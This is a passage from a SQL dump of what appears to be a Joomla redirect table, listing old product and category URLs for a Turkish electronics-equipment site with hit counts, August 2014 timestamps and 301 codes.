00:00:00',301),(3845,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',1,0,'2014-08-18 16:37:00','0000-00-00 00:00:00',301),(3846,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',2,0,'2014-08-18 16:45:24','0000-00-00 00:00:00',301),(3847,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',3,0,'2014-08-18 16:47:00','0000-00-00 00:00:00',301),(3848,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',2,0,'2014-08-18 16:56:30','0000-00-00 00:00:00',301),(3849,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',3,0,'2014-08-18 17:04:12','0000-00-00 00:00:00',301),(3850,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',4,0,'2014-08-18 17:12:12','0000-00-00 00:00:00',301),(3851,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',1,0,'2014-08-18 17:34:41','0000-00-00 00:00:00',301),(3852,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',1,0,'2014-08-18 17:46:48','0000-00-00 00:00:00',301),(3853,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',4,0,'2014-08-18 18:51:51','0000-00-00 00:00:00',301),(3854,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97','','','',5,0,'2014-08-18 19:03:56','0000-00-00 00:00:00',301),(3855,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',8,0,'2014-08-18 19:13:15','0000-00-00 00:00:00',301),(3856,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',1,0,'2014-08-18 20:01:23','0000-00-00 00:00:00',301),(3857,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',1,0,'2014-08-18 20:01:24','0000-00-00 00:00:00',301),(3858,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',1,0,'2014-08-18 20:01:29','0000-00-00 00:00:00',301),(3859,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?view=article&catid=1:son-haberler&id=165:microcare&tmpl=component&print=1&layout=default&page=&lang=tr','','','',1,0,'2014-08-18 20:01:40','0000-00-00 00:00:00',301),(3860,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',2,0,'2014-08-18 20:01:45','0000-00-00 00:00:00',301),(3861,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',1,0,'2014-08-18 20:02:01','0000-00-00 00:00:00',301),(3862,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',3,0,'2014-08-18 20:02:09','0000-00-00 00:00:00',301),(3863,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',1,0,'2014-08-18 20:02:13','0000-00-00 00:00:00',301),(3864,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',1,0,'2014-08-18 20:02:16','0000-00-00 00:00:00',301),(3865,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',1,0,'2014-08-18 20:02:18','0000-00-00 00:00:00',301),(3866,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',1,0,'2014-08-18 20:02:26','0000-00-00 00:00:00',301),(3867,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',4,0,'2014-08-18 20:55:12','0000-00-00 00:00:00',301),(3868,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',3,0,'2014-08-18 21:42:29','0000-00-00 00:00:00',301),(3869,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',1,0,'2014-08-18 22:02:55','0000-00-00 00:00:00',301),(3870,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',24,0,'2014-08-18 22:03:30','0000-00-00 00:00:00',301),(3871,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',2,0,'2014-08-18 22:03:43','0000-00-00 00:00:00',301),(3872,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',19,0,'2014-08-18 22:03:47','0000-00-00 00:00:00',301),(3873,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',20,0,'2014-08-18 22:05:03','0000-00-00 00:00:00',301),(3874,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139','','','',3,0,'2014-08-18 22:19:38','0000-00-00 00:00:00',301),(3875,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',1,0,'2014-08-18 22:29:12','0000-00-00 00:00:00',301),(3876,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',4,0,'2014-08-18 22:59:24','0000-00-00 00:00:00',301),(3877,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',6,0,'2014-08-18 23:18:18','0000-00-00 00:00:00',301),(3878,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',6,0,'2014-08-18 23:23:39','0000-00-00 00:00:00',301),(3879,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',2,0,'2014-08-18 23:45:16','0000-00-00 00:00:00',301),(3880,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',4,0,'2014-08-18 23:45:20','0000-00-00 00:00:00',301),(3881,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',2,0,'2014-08-18 23:55:30','0000-00-00 00:00:00',301),(3882,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',2,0,'2014-08-19 00:14:37','0000-00-00 00:00:00',301),(3883,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',7,0,'2014-08-19 00:33:32','0000-00-00 00:00:00',301),(3884,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',2,0,'2014-08-19 00:35:12','0000-00-00 00:00:00',301),(3885,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',1,0,'2014-08-19 00:35:18','0000-00-00 00:00:00',301),(3886,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',4,0,'2014-08-19 00:35:51','0000-00-00 00:00:00',301),(3887,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',2,0,'2014-08-19 00:45:07','0000-00-00 00:00:00',301),(3888,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',5,0,'2014-08-19 00:45:46','0000-00-00 00:00:00',301),(3889,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',3,0,'2014-08-19 00:58:08','0000-00-00 00:00:00',301),(3890,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',1,0,'2014-08-19 01:07:34','0000-00-00 00:00:00',301),(3891,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',4,0,'2014-08-19 01:10:55','0000-00-00 00:00:00',301),(3892,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',1,0,'2014-08-19 01:20:50','0000-00-00 00:00:00',301),(3893,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',5,0,'2014-08-19 01:24:33','0000-00-00 00:00:00',301),(3894,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127','','','',2,0,'2014-08-19 01:24:51','0000-00-00 00:00:00',301),(3895,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',1,0,'2014-08-19 01:26:33','0000-00-00 00:00:00',301),(3896,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',6,0,'2014-08-19 01:28:07','0000-00-00 00:00:00',301),(3897,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',3,0,'2014-08-19 01:47:09','0000-00-00 00:00:00',301),(3898,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',1,0,'2014-08-19 01:50:24','0000-00-00 00:00:00',301),(3899,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92','','','',5,0,'2014-08-19 02:05:51','0000-00-00 00:00:00',301),(3900,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',3,0,'2014-08-19 02:15:36','0000-00-00 00:00:00',301),(3901,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',4,0,'2014-08-19 02:18:09','0000-00-00 00:00:00',301),(3902,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',7,0,'2014-08-19 02:34:45','0000-00-00 00:00:00',301),(3903,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',6,0,'2014-08-19 02:42:29','0000-00-00 00:00:00',301),(3904,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',91,0,'2014-08-19 03:19:24','0000-00-00 00:00:00',301),(3905,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=&lang=en','','','',1,0,'2014-08-19 03:31:08','0000-00-00 00:00:00',301),(3906,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',3,0,'2014-08-19 03:35:36','0000-00-00 00:00:00',301),(3907,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',8,0,'2014-08-19 03:41:40','0000-00-00 00:00:00',301),(3908,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',3,0,'2014-08-19 03:51:50','0000-00-00 00:00:00',301),(3909,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-08-19 03:57:08','0000-00-00 00:00:00',301),(3910,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',2,0,'2014-08-19 04:10:20','0000-00-00 00:00:00',301),(3911,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',3,0,'2014-08-19 04:42:35','0000-00-00 00:00:00',301),(3912,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',2,0,'2014-08-19 04:46:41','0000-00-00 00:00:00',301),(3913,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',6,0,'2014-08-19 04:58:41','0000-00-00 00:00:00',301),(3914,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',3,0,'2014-08-19 05:02:52','0000-00-00 00:00:00',301),(3915,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',5,0,'2014-08-19 05:21:08','0000-00-00 00:00:00',301),(3916,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',4,0,'2014-08-19 05:27:05','0000-00-00 00:00:00',301),(3917,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',9,0,'2014-08-19 05:57:40','0000-00-00 00:00:00',301),(3918,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',2,0,'2014-08-19 05:59:52','0000-00-00 00:00:00',301),(3919,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',1,0,'2014-08-19 06:18:11','0000-00-00 00:00:00',301),(3920,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',3,0,'2014-08-19 06:28:07','0000-00-00 00:00:00',301),(3921,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',3,0,'2014-08-19 06:32:10','0000-00-00 00:00:00',301),(3922,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',3,0,'2014-08-19 06:38:16','0000-00-00 00:00:00',301),(3923,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',8,0,'2014-08-19 06:59:19','0000-00-00 00:00:00',301),(3924,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',4,0,'2014-08-19 07:17:55','0000-00-00 00:00:00',301),(3925,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',2,0,'2014-08-19 07:31:02','0000-00-00 00:00:00',301),(3926,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',2,0,'2014-08-19 07:35:05','0000-00-00 00:00:00',301),(3927,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',3,0,'2014-08-19 07:43:50','0000-00-00 00:00:00',301),(3928,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',2,0,'2014-08-19 07:45:16','0000-00-00 00:00:00',301),(3929,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',2,0,'2014-08-19 08:07:33','0000-00-00 00:00:00',301),(3930,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',9,0,'2014-08-19 08:34:39','0000-00-00 00:00:00',301),(3931,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',3,0,'2014-08-19 08:37:58','0000-00-00 00:00:00',301),(3932,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',4,0,'2014-08-19 08:40:08','0000-00-00 00:00:00',301),(3933,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',5,0,'2014-08-19 09:00:15','0000-00-00 00:00:00',301),(3934,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99','','','',3,0,'2014-08-19 09:48:06','0000-00-00 00:00:00',301),(3935,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',5,0,'2014-08-19 09:50:34','0000-00-00 00:00:00',301),(3936,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',3,0,'2014-08-19 09:57:10','0000-00-00 00:00:00',301),(3937,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',10,0,'2014-08-19 10:07:56','0000-00-00 00:00:00',301),(3938,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',10,0,'2014-08-19 10:08:06','0000-00-00 00:00:00',301),(3939,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',10,0,'2014-08-19 10:08:10','0000-00-00 00:00:00',301),(3940,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',7,0,'2014-08-19 10:27:36','0000-00-00 00:00:00',301),(3941,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',2,0,'2014-08-19 10:39:47','0000-00-00 00:00:00',301),(3942,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',2,0,'2014-08-19 10:43:50','0000-00-00 00:00:00',301),(3943,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-19 10:49:18','0000-00-00 00:00:00',301),(3944,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/archived-articles/2011','','','',24,0,'2014-08-19 10:59:17','0000-00-00 00:00:00',301),(3945,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',2,0,'2014-08-19 11:06:51','0000-00-00 00:00:00',301),(3946,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',5,0,'2014-08-19 11:12:24','0000-00-00 00:00:00',301),(3947,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',7,0,'2014-08-19 11:17:47','0000-00-00 00:00:00',301),(3948,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-19 11:28:13','0000-00-00 00:00:00',301),(3949,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123','','','',3,0,'2014-08-19 11:33:14','0000-00-00 00:00:00',301),(3950,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',3,0,'2014-08-19 11:33:29','0000-00-00 00:00:00',301),(3951,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',2,0,'2014-08-19 11:37:13','0000-00-00 00:00:00',301),(3952,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',4,0,'2014-08-19 11:43:27','0000-00-00 00:00:00',301),(3953,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',2,0,'2014-08-19 11:52:59','0000-00-00 00:00:00',301),(3954,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',3,0,'2014-08-19 12:24:08','0000-00-00 00:00:00',301),(3955,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',3,0,'2014-08-19 13:11:24','0000-00-00 00:00:00',301),(3956,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129','','','',1,0,'2014-08-19 13:54:43','0000-00-00 00:00:00',301),(3957,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',9,0,'2014-08-19 14:16:33','0000-00-00 00:00:00',301),(3958,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',2,0,'2014-08-19 14:26:09','0000-00-00 00:00:00',301),(3959,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/archived-articles/2011','','','',5,0,'2014-08-19 14:31:42','0000-00-00 00:00:00',301),(3960,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/archived-articles/2011','','','',32,0,'2014-08-19 14:39:44','0000-00-00 00:00:00',301),(3961,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',6,0,'2014-08-19 15:11:33','0000-00-00 00:00:00',301),(3962,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-08-19 15:22:38','0000-00-00 00:00:00',301),(3963,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144','','','',4,0,'2014-08-19 15:28:57','0000-00-00 00:00:00',301),(3964,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28','','','',7,0,'2014-08-19 16:16:41','0000-00-00 00:00:00',301),(3965,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',3,0,'2014-08-19 16:55:26','0000-00-00 00:00:00',301),(3966,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',5,0,'2014-08-19 16:55:57','0000-00-00 00:00:00',301),(3967,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',4,0,'2014-08-19 17:39:29','0000-00-00 00:00:00',301),(3968,'http://www.3s-technologies.com.tr/index.php/en/cont','','','',1,0,'2014-08-19 17:47:09','0000-00-00 00:00:00',301),(3969,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',6,0,'2014-08-19 20:17:41','0000-00-00 00:00:00',301),(3970,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',1,0,'2014-08-19 21:28:13','0000-00-00 00:00:00',301),(3971,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',3,0,'2014-08-19 22:10:46','0000-00-00 00:00:00',301),(3972,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',2,0,'2014-08-19 22:56:25','0000-00-00 00:00:00',301),(3973,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',1,0,'2014-08-19 23:04:55','0000-00-00 00:00:00',301),(3974,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',3,0,'2014-08-19 23:33:20','0000-00-00 00:00:00',301),(3975,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',3,0,'2014-08-19 23:43:20','0000-00-00 00:00:00',301),(3976,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-19 23:57:08','0000-00-00 00:00:00',301),(3977,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',3,0,'2014-08-20 00:05:20','0000-00-00 00:00:00',301),(3978,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',11,0,'2014-08-20 00:46:27','0000-00-00 00:00:00',301),(3979,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',2,0,'2014-08-20 00:46:55','0000-00-00 00:00:00',301),(3980,'http://3s-technologies.com.tr/index.php/en/welcome.html','','','',35,0,'2014-08-20 00:47:10','0000-00-00 00:00:00',301),(3981,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',5,0,'2014-08-20 00:54:15','0000-00-00 00:00:00',301),(3982,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',6,0,'2014-08-20 00:54:17','0000-00-00 00:00:00',301),(3983,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',2,0,'2014-08-20 01:01:41','0000-00-00 00:00:00',301),(3984,'http://3s-technologies.com.tr/index.php/tr/parks-home','','','',25,0,'2014-08-20 01:10:08','0000-00-00 00:00:00',301),(3985,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154','','','',6,0,'2014-08-20 01:14:38','0000-00-00 00:00:00',301),(3986,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',2,0,'2014-08-20 01:23:33','0000-00-00 00:00:00',301),(3987,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',3,0,'2014-08-20 01:31:54','0000-00-00 00:00:00',301),(3988,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',3,0,'2014-08-20 